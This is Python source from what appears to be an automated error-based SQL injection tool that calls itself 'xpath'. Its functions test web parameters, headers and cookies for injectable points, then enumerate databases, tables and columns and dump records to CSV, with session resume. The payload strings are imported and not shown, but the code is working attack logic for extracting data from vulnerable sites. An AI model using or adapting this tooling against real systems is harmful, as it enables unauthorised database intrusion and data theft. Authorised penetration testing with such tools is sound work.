def _pprint_records(self, field_names, database="", table_name="", table="", columns=None):
    """Render dumped records for *table* and mirror them to a CSV file.

    Reads the rows stored in the session table *table_name*, writes them out
    via ``session.dump_to_csv``, re-reads them, and prints a formatted table
    through ``logger.success``.

    :param field_names: column header string for the pretty-printer.
    :param database: database name (display only).
    :param table_name: session-store table holding the dumped rows.
    :param table: target table name (display / CSV naming).
    :param columns: optional list of column names used to group the rows.
    """
    grouped = ""
    if columns:
        grouped = ",".join([f"`{name.strip()}`" for name in columns])

    def _rows():
        # A fetched cursor is consumed on use, so we fetch once for the CSV
        # dump and once more for the pretty-printer.
        return session.fetch_from_table(
            session_filepath=self.session_filepath,
            table_name=table_name,
            group_by_columns=grouped,
        )

    # this time get the cursor to dump data into csv file..
    ok = session.dump_to_csv(
        cursor=_rows(),
        filepath=self.session_filepath,
        database=database,
        table=table,
    )
    pretty = prettifier(_rows(), field_names, header=True)
    logger.success(f"Database: {database}")
    logger.success(f"Table: {table}")
    logger.success(f"[{pretty.entries} entries]")
    logger.success(f"{pretty.data}")
def search(self, db="", tbl="", col="", search_type=""):
    """Search for database/table/column names matching the given patterns.

    Resumes previously fetched results from the session store when present,
    counts the matching entries with an injected COUNT query, then dumps and
    pretty-prints the remainder.

    :param db: database name pattern.
    :param tbl: table name pattern.
    :param col: column name pattern.
    :param search_type: one of "database", "table", "column".
    :return: ``SearchResponse(fetched, count, results)`` namedtuple.
    """
    index = 0  # resume offset: how many values were already fetched
    _temp = []  # accumulated result values
    is_resumed = False
    fetched_data = {}
    SearchResponse = collections.namedtuple(
        "SearchResponse",
        ["fetched", "count", "results"],
    )
    if self._dbms and self._dbms == "PostgreSQL":
        # fix: user-facing typo "implemeted" -> "implemented"
        logger.warning("Search is not implemented yet for PostgreSQL..")
        return SearchResponse(fetched=False, count=0, results=[])
    payloads = self._search_payloads(db=db, tbl=tbl, col=col, search_type=search_type)
    self._table_search = payloads.table_to_generate
    try:
        fetched_data = session.fetch_from_table(
            session_filepath=self.session_filepath,
            table_name=self._table_search,
            cursor=False,
        )
        if fetched_data:
            is_resumed = True
    except Exception as error:
        # No session table for this search yet -> fresh run. Log instead of
        # silently swallowing so unexpected session errors remain visible.
        logger.debug(error)
    remainder = 0
    retval = self._extact(payloads=payloads.for_count)
    if retval.is_injected:
        found_records = int(retval.result)
        logger.info("used SQL query returns %d entries" % (found_records))
        if found_records == 0:
            # Explain why nothing matched, depending on what was searched.
            if search_type == "database":
                logger.warning(f"no databases LIKE '{db}' found")
            if search_type == "table":
                if not db:
                    logger.warning(
                        f"no databases have tables LIKE '{tbl}'")
                if db:
                    logger.warning(
                        f"no tables LIKE '{tbl}' in database '{db}'")
                logger.warning(
                    f"no databases contain any of the provided tables")
            if search_type == "column":
                if not tbl and not db:
                    logger.warning(
                        f"no databases have tables containing columns LIKE '{col}'"
                    )
                if not tbl and db:
                    # fix: this branch reports on column matches but used to
                    # interpolate '{tbl}', which is empty here by definition.
                    logger.warning(
                        f"no tables contain columns LIKE '{col}' in database '{db}'"
                    )
                if not db and tbl:
                    logger.warning(
                        f"no databases have tables containing columns LIKE '{col}' for table '{tbl}'"
                    )
                if db and tbl:
                    logger.warning(
                        f"unable to retrieve column names for table '{tbl}' in database '{db}'"
                    )
                logger.warning(
                    f"no databases have tables containing any of the provided columns"
                )
            return SearchResponse(fetched=False, count=0, results=[])
        if is_resumed:
            # Replay the values already stored in the session.
            for entry in fetched_data:
                index = entry.get("index")
                name = entry.get("value")
                _temp.append(name)
                logger.info(f"resumed: {name}")
            # Each logical result row spans N stored values depending on the
            # search type (column results store db+tbl+col, table results
            # store db+tbl, database results store just the name).
            if search_type == "column":
                remainder_value = 3
            if search_type == "table":
                remainder_value = 2
            if search_type == "database":
                remainder_value = 1
            remainder = len(fetched_data) % remainder_value
            fetched_records = _temp
            _temp = self._format_results(_temp, remainder_value)
            if remainder > 0:
                # The last row was only partially fetched: drop it from the
                # formatted output and re-fetch it below.
                index -= 1
                fetched_records = fetched_records[-remainder:]
                _temp.pop()
        if remainder > 0:
            records = self._format_results(fetched_records, remainder_value)
        else:
            records = []
        should_fetch = True
        if is_resumed:
            if index == found_records:
                should_fetch = False
        if should_fetch:
            retval = self._extact(payloads=payloads.for_dump)
            if retval.is_injected:
                payload = retval.payload
                payloads = self._generate_search_dump_payloads(
                    count=found_records, payload=payload, index=index)
                if not is_resumed:
                    session.generate_table(
                        session_filepath=self.session_filepath,
                        query=TBL_SEARCH.format(name=self._table_search),
                    )
                response_data = self._extract_search_results(
                    payloads=payloads,
                    database=db,
                    table=tbl,
                    search_type=search_type,
                    records=records,
                    position=index,
                )
                if response_data.is_fetched:
                    _temp.extend(response_data.result)
                self._pprint_search_results(search_type, _temp)
                return SearchResponse(fetched=True, count=found_records, results=_temp)
            if not retval.is_injected:
                status_code = retval.status_code
                error = retval.error
                count = retval.payloads_count
                if status_code not in [200, 0]:
                    message = f"{error} - {count} times"
                    logger.warning(
                        f"HTTP error codes detected during run:\n{message}"
                    )
                else:
                    message = f"tested with '{count}' queries, unable to find working SQL query."
                logger.critical(message)
        else:
            # Everything was already fetched in a previous run.
            self._pprint_search_results(search_type, _temp)
            return SearchResponse(fetched=True, count=found_records, results=_temp)
    if not retval.is_injected:
        status_code = retval.status_code
        error = retval.error
        count = retval.payloads_count
        if status_code not in [200, 0]:
            message = f"{error} - {count} times"
            logger.warning(
                f"HTTP error codes detected during run:\n{message}")
        else:
            message = (
                f"tested with '{count}' queries, unable to find working SQL query."
            )
        logger.critical(message)
    return SearchResponse(fetched=False, count=0, results=[])
def tbl_names(self, db=""):
    """Enumerate table names of database *db* via error-based injection.

    Resumes previously fetched names from the session store when available
    and extracts only the remainder.

    :param db: database whose tables should be listed.
    :return: ``TablesResponse(fetched, count, database, tables)`` namedtuple.
    """
    index = 0  # resume offset: number of rows already stored in the session
    _temp = []  # accumulated table names
    is_resumed = False
    fetched_data = {}
    _temp_payloads = []
    TablesResponse = collections.namedtuple(
        "TablesResponse", ["fetched", "count", "database", "tables"])
    if db:
        # Start from the union of payloads for every supported DBMS, then
        # narrow down to the fingerprinted backend if we already know it.
        dump_payloads = []
        [dump_payloads.extend(v) for _, v in PAYLOADS_TBLS_NAMES.items()]
        encode_string = to_hex(db, dbms=self._dbms)
        if self._dbms:
            dump_payloads = PAYLOADS_TBLS_NAMES.get(
                self._dbms, dump_payloads)
        for entry in dump_payloads:
            if self._dbms and self._dbms.startswith("Microsoft"):
                # MSSQL 'sysobjects' payloads take the raw database name,
                # the remaining ones take the hex-encoded form.
                if "sysobjects" in entry:
                    data = entry.format(db=db.strip(), db1=db.strip())
                else:
                    data = entry.format(db=encode_string, db1=encode_string)
            else:
                data = entry.format(db=encode_string)
            _temp_payloads.append(data)
        try:
            fetched_data = session.fetch_from_table(
                session_filepath=self.session_filepath,
                table_name=db,
                cursor=False,
            )
            if fetched_data:
                is_resumed = True
        except Exception as error:
            # Session table does not exist yet -> nothing to resume.
            pass
        logger.info("fetching tables for database: '%s'" % (db))
        retval = self._tbl_count(db=db)
        if retval.is_injected:
            tbl_count = int(retval.result)
            if tbl_count != 0:
                logger.info("used SQL query returns %d entries" % (tbl_count))
            if tbl_count == 0:
                logger.warning(
                    "used SQL query returns %d entries for database: '%s'" %
                    (tbl_count, db))
                return TablesResponse(fetched=False,
                                      count=tbl_count,
                                      database=db,
                                      tables=[])
            if is_resumed:
                # Replay already-fetched names; index counts stored rows so
                # extraction can resume from the right position.
                for entry in fetched_data:
                    name = entry.get("tblname")
                    if name not in _temp:
                        _temp.append(name)
                    logger.info(f"resumed: '{name}'")
                    index += 1
            should_fetch = True
            if is_resumed:
                if len(fetched_data) == tbl_count:
                    should_fetch = False
            if should_fetch:
                payloads = self._generat_payload(payloads_list=_temp_payloads)
                retval = self._extact(payloads=payloads)
                if retval.is_injected:
                    payload = retval.payload
                    payloads = self._generate_tbl_payloads(tbl_count=tbl_count,
                                                           payload=payload,
                                                           index=index)
                    if not is_resumed:
                        # First run for this database: create its session table.
                        session.generate_table(
                            session_filepath=self.session_filepath,
                            query=DB_TABLES.format(name=db, tbl_name=db),
                        )
                    response_data = self._extract_tbls(payloads=payloads, database=db)
                    if response_data.is_fetched:
                        _temp.extend(response_data.result)
                    self._pprint_tables(
                        cursor_or_list=_temp,
                        field_names="Tables",
                        database=db,
                    )
                    return TablesResponse(fetched=True,
                                          count=tbl_count,
                                          database=db,
                                          tables=_temp)
                if not retval.is_injected:
                    # Dump-phase extraction failed: report HTTP errors if any.
                    status_code = retval.status_code
                    error = retval.error
                    count = retval.payloads_count
                    if status_code not in [200, 0]:
                        message = f"{error} - {count} times"
                        logger.warning(
                            f"HTTP error codes detected during run:\n{message}"
                        )
                    else:
                        message = f"tested with '{count}' queries, unable to find working SQL query."
                    logger.critical(message)
            else:
                # All table names were already fetched in a previous run.
                self._pprint_tables(
                    cursor_or_list=_temp,
                    field_names="Tables",
                    database=db,
                )
                return TablesResponse(fetched=True,
                                      count=tbl_count,
                                      database=db,
                                      tables=_temp)
        if not retval.is_injected:
            # Count-phase extraction failed.
            status_code = retval.status_code
            error = retval.error
            count = retval.payloads_count
            if status_code not in [200, 0]:
                message = f"{error} - {count} times"
                logger.warning(
                    f"HTTP error codes detected during run:\n{message}")
            else:
                message = (
                    f"tested with '{count}' queries, unable to find working SQL query."
                )
            logger.critical(message)
    return TablesResponse(fetched=False, count=0, database="", tables=_temp)
def perform(self):
    """Run the SQL-injection detection phase against the configured target.

    Tests the connection, optionally adopts server-set cookies, resumes any
    previously identified injection points from the session store, and
    otherwise iterates every testable parameter against the prepared payload
    list until one proves injectable.

    :return: ``Response`` namedtuple describing whether the target is
        vulnerable, with the recommended payload and session metadata.
    """
    vulns = []
    Response = collections.namedtuple(
        "Response",
        [
            "is_vulnerable",
            "dbms",
            "payloads",
            "filepath",
            "cookies",
            "headers",
            "injection_type",
            "injected_param",
            "session_filepath",
            "recommended_payload",
            "recommended_payload_type",
        ],
    )
    attemps_counter = 0  # total HTTP requests made during detection
    session_data = []
    tested_payloads = []
    successful_payloads = []
    is_resumed = False
    filepath = None
    target_info = self._parse_target()
    set_cookie = ""
    set_headers = ""
    try:
        # Connection test; also captures any Set-Cookie the server sends so
        # the user can choose to reuse it for the rest of the run.
        logger.notice("testing connection to the target URL.")
        resp = request.perform(
            self.url,
            data=self.data,
            headers=self.headers,
            use_requests=False,
            connection_test=True,
            proxy=self._proxy,
        )
        if "Set-Cookie" in list(resp.headers.keys()):
            # http.client message objects expose get_all(); fall back to
            # a plain get() for mapping-like header containers.
            set_cookie = (", ".join(resp.headers.get_all("Set-Cookie"))
                          if hasattr(resp.headers, "get_all") else
                          resp.headers.get("Set-Cookie"))
            set_cookie = re.sub(r"(?is)path=/", "", set_cookie)
            _show_slice = set_cookie.rstrip()
            if len(set_cookie) > 20:
                # Abbreviate long cookie values for the prompt.
                _show_slice = f"{set_cookie[0:14]}....{set_cookie[-10:-2]}"
            question = logger.read_input(
                f"you have not declared cookie(s), while server wants to set its own ('{_show_slice}'). Do you want to use those [Y/n] ",
                batch=self._batch,
                user_input="Y",
            )
            if question in ["", "y"]:
                if "," in set_cookie:
                    set_cookie = "".join([
                        i.strip().replace("path=/", "").strip()
                        for i in set_cookie.split(",")
                    ])
                set_cookie = ";".join(set_cookie.split(";"))
                set_cookie = f"Cookie: {set_cookie}"
                if (not self.headers
                        or self.headers and "cookie" not in self.headers.lower()):
                    self.headers += set_cookie
    except Exception as error:
        logger.critical(
            "Xpath was not able to establish connection. try checking with -v set to 5."
        )
        logger.error(error)
        sys.exit(0)
    payloads_list = prepare_payloads(
        prefixes=PREFIX,
        suffixes=SUFFIX,
        payloads=PAYLOADS,
        techniques=self._techniques,
    )
    try:
        # Resume previously confirmed injection points, if a session exists.
        table_name = "tbl_payload"
        session_data = session.fetch_from_table(
            session_filepath=self._session_filepath,
            table_name=table_name,
            cursor=False,
        )
        if session_data:
            is_resumed = True
            is_questioned = False
        for pay in session_data:
            vulns.append({
                "injection_type": f"({pay.get('parameter')})",
                "attempts": pay.get("payload_attemps"),
                "payload": pay.get("payload"),
                "title": pay.get("payload_type"),
                "order": pay.get("payload_order"),
                "regex": pay.get("regex"),
                "injected_param": pay.get("param").replace("*", ""),
                "dbms": pay.get("dbms"),
            })
    except Exception as error:
        # No stored session -> start detection from scratch.
        pass
    if not target_info.params:
        logger.critical(
            "no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')."
        )
        logger.end("ending")
        sys.exit(0)
    if not vulns:
        # Detection phase: try every parameter against every payload group.
        params = target_info.params
        injection_type = target_info.injection_type
        is_custom_injection = target_info.is_custom_injection
        end_detection_phase = False
        is_injected = False
        successful_payload_prefix = ""
        vulnerable_param = ""
        unknown_error_counter = 0
        dbms = ""
        for entry in params:
            param = entry.get("key")
            param_value = entry.get("value")
            if is_custom_injection and not param_value.endswith("*"):
                # Custom injection marks the spot with '*'; skip others.
                continue
            sep = ": " if "header" in injection_type.lower() else "="
            injectable_param = (f"{param}{sep}{param_value}"
                                if param_value else f"{param}{sep}")
            resp = self.is_injectable(
                self.url,
                self.data,
                self.headers,
                param=param,
                injectable_param=injectable_param,
                injection_type=injection_type,
            )
            if not dbms:
                dbms = resp.dbms
            is_injectable = resp.injectable
            logger.info(
                f"testing for SQL injection on {injection_type} parameter '{param if not is_custom_injection else '#1*'}'"
            )
            next_param_test = False
            for entry in payloads_list:
                backend = entry.get("back_end")
                title = entry.get("title")
                if dbms and dbms.lower() != backend.lower():
                    # Backend already fingerprinted -> skip other DBMS payloads.
                    logger.debug(f"Skipped '{title}'")
                    continue
                regex = entry.get("regex")
                order = entry.get("order")
                payloads = entry.get("payloads")
                logger.info(f"testing '{title}'")
                index = 0
                if successful_payload_prefix:
                    # A prefix already worked: restrict to matching payloads.
                    payloads = [
                        pl for pl in payloads
                        if pl.prefix == successful_payload_prefix
                    ]
                while index < len(payloads):
                    url = self.url
                    data = self.data
                    headers = self.headers
                    obj = payloads[index]
                    payload = obj.string
                    prefix = obj.prefix
                    suffix = obj.suffix
                    logger.payload(payload)
                    it = self._injection_type.upper()
                    # Inject the payload into whichever carrier matches the
                    # configured injection type.
                    if "HEADER" in it or "COOKIE" in it:
                        headers = prepare_injection_payload(
                            text=self.headers,
                            payload=payload,
                            param=injectable_param,
                            unknown_error_counter=unknown_error_counter,
                        )
                    if "GET" in it:
                        url = prepare_injection_payload(
                            text=self.url,
                            payload=payload,
                            param=injectable_param,
                            unknown_error_counter=unknown_error_counter,
                        )
                    if "POST" in it:
                        data = prepare_injection_payload(
                            text=self.data,
                            payload=payload,
                            param=injectable_param,
                            unknown_error_counter=unknown_error_counter,
                        )
                    try:
                        if not is_injected:
                            attemps_counter += 1
                        response = request.inject_payload(
                            url=url,
                            regex=REGEX_TESTS,
                            data=data,
                            headers=headers,
                            use_requests=self._use_requests,
                            proxy=self._proxy,
                        )
                    except KeyboardInterrupt as e:
                        # Let the user steer the run on Ctrl-C.
                        question = logger.read_input(
                            "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] "
                        )
                        if question and question == "e":
                            end_detection_phase = True
                            break
                        if question and question == "s":
                            break
                        if question and question == "n":
                            next_param_test = True
                            break
                        if question and question.lower() == "q":
                            logger.error("user quit")
                            logger.end("ending")
                            sys.exit(0)
                    except Exception as e:
                        unknown_error_counter += 1
                    else:
                        if response.ok:
                            # Payload worked: persist the finding to the
                            # session and record it for the report.
                            is_injected = True
                            successful_payload_prefix = prefix
                            _ = session.generate(
                                session_filepath=self._session_filepath)
                            with open(self._target_file, "w") as fd:
                                fd.write(
                                    f"{self.url} ({'GET' if 'cookie' in injection_type.lower() else injection_type}) # {' '.join(sys.argv)}"
                                )
                            if param:
                                message = f"{injection_type} parameter '{DIM}{white}{param}{BRIGHT}{black}' is '{DIM}{white}{title}{BRIGHT}{black}' injectable"
                            else:
                                message = f"{injection_type} parameter is '{DIM}{white}{title}{BRIGHT}{black}' injectable"
                            logger.notice(message)
                            vulns.append({
                                "injection_type": f"({injection_type})",
                                "attempts": attemps_counter,
                                "payload": payload,
                                "title": title,
                                "order": order,
                                "regex": regex,
                                "injected_param": injectable_param.replace("*", ""),
                                "dbms": dbms,
                            })
                            _ = session.dump(
                                session_filepath=self._session_filepath,
                                query=PAYLOAD_STATEMENT,
                                values=(
                                    str(title),
                                    order,
                                    attemps_counter,
                                    payload,
                                    injection_type,
                                    regex,
                                    "test",
                                    injectable_param,
                                    dbms,
                                ),
                            )
                            vulnerable_param = param
                            break
                    index += 1
                if end_detection_phase or next_param_test:
                    break
            if not is_injected:
                _param = f"{DIM}{white}'{param}'{BRIGHT}{black}"
                logger.notice(
                    f"{injection_type} parameter {_param} does not seem to be injectable"
                )
            if end_detection_phase:
                if not is_injected:
                    logger.critical(
                        "all tested parameters do not appear to be injectable"
                    )
                break
            if is_injected and not next_param_test:
                if vulnerable_param:
                    message = f"{injection_type} parameter '{vulnerable_param}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
                else:
                    message = f"{injection_type} parameter is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
                question = logger.read_input(message,
                                             batch=self._batch,
                                             user_input="N")
                if question and question == "n":
                    break
    else:
        logger.debug(
            "skipping tests as we already have injected the target..")
    if vulns and isinstance(vulns, list):
        # Report phase: pick the best payload and summarize the findings.
        vulns = sorted(
            vulns,
            key=lambda k: k.get("order")
            if k.get("order") else k.get("payload_order"),
            reverse=True,
        )
        dbms = vulns[0].get("dbms")
        injection_type = vulns[0].get("injection_type")
        injected_param = vulns[0].get("injected_param")
        recommended_payload = vulns[0].get("payload")
        recommended_payload = clean_up_payload(
            payload=recommended_payload,
            replaceable_string="0x72306f746833783439")
        recommended_payload_type = vulns[0].get("regex")
        param = injected_param
        if not param and self.headers:
            # Header-based injection: recover which header carried the payload.
            params = extract_params(self.headers, injection_type=injection_type)
            payload = prepare_injection_payload(self.headers,
                                                recommended_payload,
                                                param="").replace("%20", " ")
            param = ""
            for p in params:
                sep = ": " if "header" in injection_type.lower() else "="
                _param = f"{p.get('key')}{sep}{p.get('value').replace('*', '')}"
                _ = f"{_param}{recommended_payload}"
                if _ in payload.strip():
                    param = _param
                    break
        if not is_resumed:
            message = f"xpath identified the following injection point(s) with a total of {attemps_counter} HTTP(s) requests:"
        if is_resumed:
            message = "xpath resumed the following injection point(s) from stored session:"
        logger.success(message)
        if param:
            sep = ":" if "header" in injection_type.lower() else "="
            _param = param.split(sep)[0] if sep in param else param
            injection_type = f"{_param} {injection_type}"
        logger.success(f"---\nParameter: {injection_type}")
        text = " Type: error-based\n Title: {title}\n Payload: {_payload}"
        ok = []
        for v in vulns:
            title = v.get("title").strip()
            pl = v.get("payload").strip()
            if pl[0].lower() in ["a", "o"]:
                # Payloads starting with AND/OR need a leading space.
                pl = f" {pl}"
            if param and "HEADER" not in injection_type.upper():
                pl = f"{param}{pl}"
            ok.append(text.format(title=title, _payload=pl))
        logger.success("\n\n".join(ok))
        logger.success("---")
        resp = Response(
            is_vulnerable=True,
            payloads=vulns,
            dbms=dbms,
            filepath=self._filepath,
            cookies=set_cookie,
            headers=set_headers,
            injected_param=injected_param,
            injection_type=self._injection_type,
            session_filepath=self._session_filepath,
            recommended_payload=recommended_payload,
            recommended_payload_type=recommended_payload_type,
        )
    else:
        resp = Response(
            is_vulnerable=False,
            dbms=dbms,
            payloads=vulns,
            filepath=None,
            cookies=set_cookie,
            headers=set_headers,
            injected_param=None,
            session_filepath=None,
            injection_type=None,
            recommended_payload=None,
            recommended_payload_type=None,
        )
    return resp
def dbs_names(self):
    """Enumerate available database names via error-based injection.

    Resumes previously fetched names from the session store ("tbl_databases")
    when available and extracts only the remainder.

    :return: ``DatabasesResponse(fetched, count, databases)`` namedtuple.
    """
    is_resumed = False
    index = 0  # resume offset: number of rows already stored in the session
    fetched_data = {}
    _temp = []  # accumulated database names
    DatabasesResponse = collections.namedtuple(
        "DatabasesResponse", ["fetched", "count", "databases"])
    try:
        fetched_data = session.fetch_from_table(
            session_filepath=self.session_filepath,
            table_name="tbl_databases",
            cursor=False,
        )
        if fetched_data:
            is_resumed = True
    except Exception as error:
        # Session table does not exist yet -> nothing to resume.
        pass
    logger.info("fetching database names")
    # NOTE(review): accessed without parentheses, unlike _tbl_count(db=...)
    # and _data_count(...) elsewhere — presumably _dbs_count is a property;
    # confirm against its definition.
    retval = self._dbs_count
    if retval.is_injected:
        dbs_count = int(retval.result)
        if dbs_count != 0:
            logger.info("used SQL query returns %d entries" % (dbs_count))
        if dbs_count == 0:
            logger.warning(
                "used SQL query returns %d entries for database names.." %
                (dbs_count))
            return DatabasesResponse(fetched=False,
                                     count=dbs_count,
                                     databases=[])
        if is_resumed:
            # Replay already-fetched names; index counts stored rows so
            # extraction can resume from the right position.
            for entry in fetched_data:
                name = entry.get("dbname")
                if name not in _temp:
                    _temp.append(name)
                # logger.info(f"resumed: '{name}'")
                index += 1
        should_fetch = True
        if is_resumed:
            if len(fetched_data) == dbs_count:
                should_fetch = False
        if should_fetch:
            payloads = self._generat_payload(
                payloads_list=PAYLOADS_DBS_NAMES)
            retval = self._extact(payloads=payloads)
            if retval.is_injected:
                payload = retval.payload
                payloads = self._generate_dbs_payloads(dbs_count=dbs_count,
                                                       payload=payload,
                                                       index=index)
                response_data = self._extract_dbs(payloads=payloads)
                if response_data.is_fetched:
                    _temp.extend(response_data.result)
                self._available_dbs(dbs_count, _temp)
                return DatabasesResponse(fetched=True,
                                         count=dbs_count,
                                         databases=_temp)
            if not retval.is_injected:
                # Dump-phase extraction failed: report HTTP errors if any.
                status_code = retval.status_code
                error = retval.error
                count = retval.payloads_count
                if status_code not in [200, 0]:
                    message = f"{error} - {count} times"
                    logger.warning(
                        f"HTTP error codes detected during run:\n{message}"
                    )
                else:
                    message = f"tested with '{count}' queries, unable to find working SQL query."
                logger.critical(message)
        else:
            # All database names were already fetched in a previous run.
            self._available_dbs(dbs_count, _temp)
            return DatabasesResponse(fetched=True,
                                     count=dbs_count,
                                     databases=_temp)
    if not retval.is_injected:
        # Count-phase extraction failed.
        status_code = retval.status_code
        error = retval.error
        count = retval.payloads_count
        if status_code not in [200, 0]:
            message = f"{error} - {count} times"
            logger.warning(
                f"HTTP error codes detected during run:\n{message}")
        else:
            message = (
                f"tested with '{count}' queries, unable to find working SQL query."
            )
        logger.critical(message)
    return DatabasesResponse(fetched=False, count=0, databases=_temp)
def data_dump(self, db="", tbl="", cols=""):
    """Dump records of columns *cols* from *db*.*tbl* via error-based injection.

    Resumes partially fetched rows from the session store when available and
    extracts only the remainder, then pretty-prints the dumped records.

    :param db: target database name.
    :param tbl: target table name.
    :param cols: column names (cleaned into a list by ``_clean_up_cols``).
    :return: ``RecordsResponse(fetched, count, database, table, columns,
        records)`` namedtuple.
    """
    index = 0  # resume offset: last stored record index
    _temp = []  # accumulated record values
    is_resumed = False
    fetched_data = {}
    _temp_payloads = []
    fetched_records = []
    cols = self._clean_up_cols(cols)
    # Zero-padded column count; used as a prefix for session table names.
    count = "{0:03d}".format(len(cols))
    RecordsResponse = collections.namedtuple(
        "RecordsResponse",
        ["fetched", "count", "database", "table", "columns", "records"],
    )
    if db and tbl and cols and isinstance(cols, list):
        # Start from the union of payloads for every supported DBMS, then
        # narrow down to the fingerprinted backend if we already know it.
        dump_payloads = []
        [dump_payloads.extend(v) for _, v in PAYLOADS_RECS_DUMP.items()]
        test_column = "0x72306f746833783439"
        if self._dbms:
            dump_payloads = PAYLOADS_RECS_DUMP.get(self._dbms, dump_payloads)
            test_column = "1337"
        for i in dump_payloads:
            data = i.format(col=test_column, db=db, tbl=tbl)
            _temp_payloads.append(data)
        try:
            tmp_table_name = f"{count}_{tbl.strip()}_tmp"
            fetched_data = session.fetch_from_table(
                session_filepath=self.session_filepath,
                table_name=tmp_table_name,
                group_by_columns="`index`,`column_name`,`column_value`",
                cursor=False,
            )
            if fetched_data:
                is_resumed = True
        except Exception as error:
            # Session table does not exist yet -> nothing to resume.
            pass
        logger.info(
            "fetching column(s) '%s' for table '%s' in database: '%s'" %
            (", ".join(cols), tbl, db))
        last_seen = 0
        remainder = 0
        retval = self._data_count(db=db, tbl=tbl)
        if retval.is_injected:
            data_count = int(retval.result)
            if data_count != 0:
                logger.info("used SQL query returns %d entries" % (data_count))
            if data_count == 0:
                logger.warning(
                    "used SQL query returns %d entries of columns '%s' for table '%s' in database '%s'"
                    % (data_count, ", ".join(cols), tbl, db))
                return RecordsResponse(
                    fetched=False,
                    count=data_count,
                    database=db,
                    table=tbl,
                    columns=cols,
                    records=[],
                )
            if is_resumed:
                _temp = fetched_data
                for entry in fetched_data:
                    last_seen = index = entry.get("index")
                    value = entry.get("column_value")
                    # logger.info(f"resumed: '{value}'")
                    fetched_records.append(value)
                # Each record spans len(cols) stored values; a non-zero
                # remainder means the last record was only partially fetched.
                remainder = len(fetched_data) % len(cols)
                if remainder > 0:
                    index -= 1
                    last_seen = last_seen - 1
                    fetched_records = fetched_records[-remainder:]
            should_fetch = True
            if is_resumed:
                if index == data_count:
                    should_fetch = False
            if should_fetch:
                # logger.info(f"resumed fetching from '{index+1}' record..")
                payloads = self._generat_payload(payloads_list=_temp_payloads)
                retval = self._extact(payloads=payloads)
                if retval.is_injected:
                    payload = clean_up_payload(payload=retval.payload,
                                               replace_with="{col}")
                    payloads = self._generate_data_payloads(
                        data_count=data_count,
                        payload=payload,
                        cols=cols,
                        index=index)
                    if is_resumed and remainder > 0:
                        # Presumably `payloads` maps record index -> per-column
                        # payloads; skip the columns already fetched for the
                        # partial record. TODO confirm against
                        # _generate_data_payloads.
                        remaing_records = payloads[last_seen][remainder:]
                        payloads.update({last_seen: remaing_records})
                    if not is_resumed:
                        self.__generate_records_tables(tbl=tbl,
                                                       cols=cols,
                                                       count=count)
                    response_data = self._extract_data(
                        payloads=payloads,
                        table=tbl,
                        columns=cols,
                        fetched_records=fetched_records,
                        count=count,
                    )
                    if response_data.is_fetched:
                        _temp.extend(response_data.result)
                    table_name = f"{count}_{tbl}_data"
                    self._pprint_records(
                        field_names=", ".join(cols),
                        database=db,
                        table_name=table_name,
                        table=tbl,
                        columns=cols,
                    )
                    return RecordsResponse(
                        fetched=True,
                        count=data_count,
                        database=db,
                        table=tbl,
                        columns=cols,
                        records=_temp,
                    )
                if not retval.is_injected:
                    # Dump-phase extraction failed.
                    status_code = retval.status_code
                    error = retval.error
                    # NOTE(review): this shadows the zero-padded `count`
                    # computed above; harmless here only because every later
                    # use of the padded value sits on an earlier return path —
                    # confirm before reordering.
                    count = retval.payloads_count
                    if status_code not in [200, 0]:
                        message = f"{error} - {count} times"
                        logger.warning(
                            f"HTTP error codes detected during run:\n{message}"
                        )
                    else:
                        message = f"tested with '{count}' queries, unable to find working SQL query."
                    logger.critical(message)
            else:
                # All records were already fetched in a previous run.
                table_name = f"{count}_{tbl}_data"
                self._pprint_records(
                    field_names=", ".join(cols),
                    database=db,
                    table_name=table_name,
                    table=tbl,
                    columns=cols,
                )
                return RecordsResponse(
                    fetched=True,
                    count=data_count,
                    database=db,
                    table=tbl,
                    columns=cols,
                    records=_temp,
                )
        if not retval.is_injected:
            # Count-phase extraction failed.
            status_code = retval.status_code
            error = retval.error
            count = retval.payloads_count
            if status_code not in [200, 0]:
                message = f"{error} - {count} times"
                logger.warning(
                    f"HTTP error codes detected during run:\n{message}")
            else:
                message = (
                    f"tested with '{count}' queries, unable to find working SQL query."
                )
            logger.critical(message)
    return RecordsResponse(
        fetched=False,
        count=0,
        database=None,
        table=None,
        columns=None,
        records=None,
    )